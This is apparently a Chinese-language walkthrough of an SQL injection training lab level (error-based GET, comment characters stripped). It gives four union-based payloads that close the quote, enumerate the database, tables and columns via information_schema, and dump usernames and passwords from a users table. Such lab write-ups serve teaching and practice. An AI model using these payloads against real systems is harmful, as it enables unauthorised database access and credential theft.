Less（23）GET - Error based - strip comments (基于错误的，过滤注释的GET型)

1.这个没有登录框，我们先看一下php文件

　　　

 

 

 　　看到替换了能用的注释符，所以我们构造闭合语句

2.爆破

　　（1）爆库：?id=' union select 1,2,database() '

　　　　

（2）爆表：?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() or '1'= '

　　

　　（3）爆列名：?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' or '1'= '

　　　　

 

 

 　　（4）爆值：?id=' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '